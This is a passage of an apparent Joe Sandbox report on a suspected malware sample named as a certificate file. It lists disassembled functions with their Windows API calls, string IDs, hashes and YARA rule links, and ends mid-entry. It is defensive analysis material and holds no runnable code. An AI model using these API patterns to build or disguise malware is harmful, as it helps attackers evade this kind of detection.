                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                • String ID:
                                                                                • API String ID: 1433390588-0
                                                                                • Opcode ID: c72c49e1acde24d28bc493052eb09ce97f9daea639d4b2013f9c99454b96966b
                                                                                • Instruction ID: 2a6d51f2846677274f02cf9e6ab9d7b7bd47bfa24cf0499497264a6b239438d7
                                                                                • Opcode Fuzzy Hash: c72c49e1acde24d28bc493052eb09ce97f9daea639d4b2013f9c99454b96966b
                                                                                • Instruction Fuzzy Hash: 66316DB190021AAFDB11AFA0DD49EBB7BB8FF08341F008435F916E2150E734E961DBA0
                                                                                Function 00884025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00884047
                                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,008830A5,?,00000001), ref: 0088405B
                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 00884062
                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008830A5,?,00000001), ref: 00884071
                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00884083
                                                                                • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,008830A5,?,00000001), ref: 0088409C
                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008830A5,?,00000001), ref: 008840AE
                                                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,008830A5,?,00000001), ref: 008840F3
                                                                                • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,008830A5,?,00000001), ref: 00884108
                                                                                • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,008830A5,?,00000001), ref: 00884113
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                • String ID:
                                                                                • API String ID: 2156557900-0
                                                                                • Opcode ID: 17c27c606e7094ec357c489598f5b230c68ea02766d1d85d4e94d15d13a2d0c6
                                                                                • Instruction ID: 0af9d28f17690720b2ff86e6b78b070224424d055f51496e49cc146b14af07e3
                                                                                • Opcode Fuzzy Hash: 17c27c606e7094ec357c489598f5b230c68ea02766d1d85d4e94d15d13a2d0c6
                                                                                • Instruction Fuzzy Hash: F831CE76510216AFEB10EF54DC89F6AB7BDFB60311F10D019FD05E6291CBB49A80CBA0
                                                                                Function 008BDD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSysColor.USER32(00000008), ref: 0085B496
                                                                                • SetTextColor.GDI32(?,000000FF), ref: 0085B4A0
                                                                                • SetBkMode.GDI32(?,00000001), ref: 0085B4B5
                                                                                • GetStockObject.GDI32(00000005), ref: 0085B4BD
                                                                                • GetClientRect.USER32(?), ref: 008BDD63
                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 008BDD7A
                                                                                • GetWindowDC.USER32(?), ref: 008BDD86
                                                                                • GetPixel.GDI32(00000000,?,?), ref: 008BDD95
                                                                                • ReleaseDC.USER32(?,00000000), ref: 008BDDA7
                                                                                • GetSysColor.USER32(00000005), ref: 008BDDC5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                • String ID:
                                                                                • API String ID: 3430376129-0
                                                                                • Opcode ID: 5822eef6ade70dfc5475528dca2d72e560ad6fdaa84ee0c93d2f561ae705d2db
                                                                                • Instruction ID: bbd96e265957f6f9b9a8f0ddbcd53d09783ff005c1c7a1846931a97314df21b3
                                                                                • Opcode Fuzzy Hash: 5822eef6ade70dfc5475528dca2d72e560ad6fdaa84ee0c93d2f561ae705d2db
                                                                                • Instruction Fuzzy Hash: 80114931500305FFDB216BA4EC08FE97BB1FB14326F148675FA66A51E2DB314941EB21
                                                                                Function 0087CB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnumChildWindows.USER32(?,0087CF50), ref: 0087CE90
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ChildEnumWindows
                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                • API String ID: 3555792229-1603158881
                                                                                • Opcode ID: 609632cb6baeebe3f7d5302f8cbd1a140afb8110487aeb9c94c2c63427d76844
                                                                                • Instruction ID: 91e6d11b41d3e1c17bb87214892004c9d5fa497f3228bf5e937a0afad0cc90e5
                                                                                • Opcode Fuzzy Hash: 609632cb6baeebe3f7d5302f8cbd1a140afb8110487aeb9c94c2c63427d76844
                                                                                • Instruction Fuzzy Hash: 2B91BF3160060AAACB18DFA4C882BEAFB74FF04310F54C519E95DE7155DF30E999CBA1
                                                                                Function 00843093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008430DC
                                                                                • CoUninitialize.OLE32(?,00000000), ref: 00843181
                                                                                • UnregisterHotKey.USER32(?), ref: 008432A9
                                                                                • DestroyWindow.USER32(?), ref: 008B5079
                                                                                • FreeLibrary.KERNEL32(?), ref: 008B50F8
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 008B5125
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                • String ID: close all
                                                                                • API String ID: 469580280-3243417748
                                                                                • Opcode ID: f4373706a7fe89c4f86d591c2f67099d6a251f2dd2651d8e15ea759e0f07b108
                                                                                • Instruction ID: 2087147a9ea6edf0bb02dae22f53c3fbdbc2464d5c4805996e23a6ccaf03820f
                                                                                • Opcode Fuzzy Hash: f4373706a7fe89c4f86d591c2f67099d6a251f2dd2651d8e15ea759e0f07b108
                                                                                • Instruction Fuzzy Hash: 4E91183060061ACFC715EF28C895BA8F3B4FF14305F5482A9E50AE7262DB30AE5ACF55
                                                                                Function 0085CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetWindowLongW.USER32(?,000000EB), ref: 0085CC15
                                                                                  • Part of subcall function 0085CCCD: GetClientRect.USER32(?,?), ref: 0085CCF6
                                                                                  • Part of subcall function 0085CCCD: GetWindowRect.USER32(?,?), ref: 0085CD37
                                                                                  • Part of subcall function 0085CCCD: ScreenToClient.USER32(?,?), ref: 0085CD5F
                                                                                • GetDC.USER32 ref: 008BD137
                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 008BD14A
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 008BD158
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 008BD16D
                                                                                • ReleaseDC.USER32(?,00000000), ref: 008BD175
                                                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 008BD200
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                • String ID: U
                                                                                • API String ID: 4009187628-3372436214
                                                                                • Opcode ID: b3ecbed925828196bd6ff8cc8e720e3a2190393368e4d2229e9b06218917b8aa
                                                                                • Instruction ID: a042f4ec4b7792df834f1200a49c5b503298ded002923d56fbd02dbb68a3e3e3
                                                                                • Opcode Fuzzy Hash: b3ecbed925828196bd6ff8cc8e720e3a2190393368e4d2229e9b06218917b8aa
                                                                                • Instruction Fuzzy Hash: 4071AC30400309EFCF219F68C881AEA7BB5FF48325F18426AED55DA2A6E7319C45DF61
                                                                                Function 008945C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008945FF
                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0089462B
                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0089466D
                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00894682
                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0089468F
                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 008946BF
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00894706
                                                                                  • Part of subcall function 00895052: GetLastError.KERNEL32(?,?,008943CC,00000000,00000000,00000001), ref: 00895067
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                • String ID:
                                                                                • API String ID: 1241431887-3916222277
                                                                                • Opcode ID: 16a528417d3e13ad298d455c2a9ecede8e7c7517129bdb54c9f61d23109d95c9
                                                                                • Instruction ID: 1550975acc7967e454823b37c7cb412c996d356006ab9d72fc8211b7b2991972
                                                                                • Opcode Fuzzy Hash: 16a528417d3e13ad298d455c2a9ecede8e7c7517129bdb54c9f61d23109d95c9
                                                                                • Instruction Fuzzy Hash: 98419DB1501208BFEF02AF94CC89FBB77ACFF09304F08512AFA05DA141D7B099468BA4
                                                                                Function 0089B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,008DDC00), ref: 0089B715
                                                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,008DDC00), ref: 0089B749
                                                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0089B8C1
                                                                                • SysFreeString.OLEAUT32(?), ref: 0089B8EB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                • String ID:
                                                                                • API String ID: 560350794-0
                                                                                • Opcode ID: 533929830105be48cdfc075945f230eb0a95832fcd89e7ff17eaf2716aaf3566
                                                                                • Instruction ID: 090944b7c42c8b1abc5e9e8437526882351369abfd92a71e6bf23cb8d17f97e5
                                                                                • Opcode Fuzzy Hash: 533929830105be48cdfc075945f230eb0a95832fcd89e7ff17eaf2716aaf3566
                                                                                • Instruction Fuzzy Hash: 21F12871A00219AFCF04EF94D984EAEBBB9FF88315F148468F915EB250DB31AE41CB50
                                                                                Function 008A24D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 008A24F5
                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008A2688
                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008A26AC
                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008A26EC
                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008A270E
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008A286F
                                                                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 008A28A1
                                                                                • CloseHandle.KERNEL32(?), ref: 008A28D0
                                                                                • CloseHandle.KERNEL32(?), ref: 008A2947
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                • String ID:
                                                                                • API String ID: 4090791747-0
                                                                                • Opcode ID: c8514bce4ed829e28d61defc204832adf91525ce078c8563f5a588666398dc6e
                                                                                • Instruction ID: d6b059057b59750d69a142d687e6fd7101758df5d83220f99978b176a5a02453
                                                                                • Opcode Fuzzy Hash: c8514bce4ed829e28d61defc204832adf91525ce078c8563f5a588666398dc6e
                                                                                • Instruction Fuzzy Hash: CFD19E316043009FDB24EF28C491A6ABBE5FF85314F18856DF999DB6A2DB30ED44CB52
                                                                                Function 008AB33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 008AB3F4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: InvalidateRect
                                                                                • String ID:
                                                                                • API String ID: 634782764-0
                                                                                • Opcode ID: df50c9a71a60856bfc6930079e8f50f2e011e89e9d63c2d78a0b3ee808862241
                                                                                • Instruction ID: 87e86c0abc22ccba6747733bf45d52453de9faa02c75b4f64302722b7696d2bd
                                                                                • Opcode Fuzzy Hash: df50c9a71a60856bfc6930079e8f50f2e011e89e9d63c2d78a0b3ee808862241
                                                                                • Instruction Fuzzy Hash: 75517D30A01208BFFF209F688C85FA97BA4FB06328F644125FA55D6AE3D771E950DA51
                                                                                Function 0085A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 008BDB1B
                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 008BDB3C
                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 008BDB51
                                                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 008BDB6E
                                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 008BDB95
                                                                                • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0085A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 008BDBA0
                                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 008BDBBD
                                                                                • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0085A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 008BDBC8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                • String ID:
                                                                                • API String ID: 1268354404-0
                                                                                • Opcode ID: 73b92272535b02afb87ba2ef56f4902c6737bfce6f28a0c71381f479fb943bf8
                                                                                • Instruction ID: 1f77523c7894a88d4d6e2a5a49f9da30e4b293a80f04ad3a6d0a2f7f9e662aa8
                                                                                • Opcode Fuzzy Hash: 73b92272535b02afb87ba2ef56f4902c6737bfce6f28a0c71381f479fb943bf8
                                                                                • Instruction Fuzzy Hash: 47515670600309AFDB24DF28CC81FAA77F8FB18765F100629F946D6290E7B0A984DB51
                                                                                Function 00887555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00886EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00885FA6,?), ref: 00886ED8
                                                                                  • Part of subcall function 00886EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00885FA6,?), ref: 00886EF1
                                                                                  • Part of subcall function 008872CB: GetFileAttributesW.KERNEL32(?,00886019), ref: 008872CC
                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 008875CA
                                                                                • _wcscmp.LIBCMT ref: 008875E2
                                                                                • MoveFileW.KERNEL32(?,?), ref: 008875FB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 793581249-0
                                                                                • Opcode ID: 4f56b2f47d47f4b5ea2f28df802d3e6cd33749e06980626ade69f07ac71663c6
                                                                                • Instruction ID: f313fd494c06c1bd0385f183519d5c97c64a476caf5c02a80887ef9137e50537
                                                                                • Opcode Fuzzy Hash: 4f56b2f47d47f4b5ea2f28df802d3e6cd33749e06980626ade69f07ac71663c6
                                                                                • Instruction Fuzzy Hash: 09510EB2A092199ADF60FB94D845DDE73BCFF08310B1041AAF609E3141EA74D6C5CF65
                                                                                Function 0085EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,008BDAD1,00000004,00000000,00000000), ref: 0085EAEB
                                                                                • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,008BDAD1,00000004,00000000,00000000), ref: 0085EB32
                                                                                • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,008BDAD1,00000004,00000000,00000000), ref: 008BDC86
                                                                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,008BDAD1,00000004,00000000,00000000), ref: 008BDCF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ShowWindow
                                                                                • String ID:
                                                                                • API String ID: 1268545403-0
                                                                                • Opcode ID: 0aa936b84cef65992f9c623f2bcb92b07b52cdc051392b3f354628c95ce075bb
                                                                                • Instruction ID: 6deff1cd351789b42d1b5bd0f4b144ff2b12c3158f72c283a25c76bd9452babe
                                                                                • Opcode Fuzzy Hash: 0aa936b84cef65992f9c623f2bcb92b07b52cdc051392b3f354628c95ce075bb
                                                                                • Instruction Fuzzy Hash: D1412830208380EAD73D5B38CD9DE6A7E96FB5132BF19041DE887E2761D671BA48D312
                                                                                Function 0087B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0087AEF1,00000B00,?,?), ref: 0087B26C
                                                                                • HeapAlloc.KERNEL32(00000000,?,0087AEF1,00000B00,?,?), ref: 0087B273
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0087AEF1,00000B00,?,?), ref: 0087B288
                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,0087AEF1,00000B00,?,?), ref: 0087B290
                                                                                • DuplicateHandle.KERNEL32(00000000,?,0087AEF1,00000B00,?,?), ref: 0087B293
                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0087AEF1,00000B00,?,?), ref: 0087B2A3
                                                                                • GetCurrentProcess.KERNEL32(0087AEF1,00000000,?,0087AEF1,00000B00,?,?), ref: 0087B2AB
                                                                                • DuplicateHandle.KERNEL32(00000000,?,0087AEF1,00000B00,?,?), ref: 0087B2AE
                                                                                • CreateThread.KERNEL32(00000000,00000000,0087B2D4,00000000,00000000,00000000), ref: 0087B2C8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
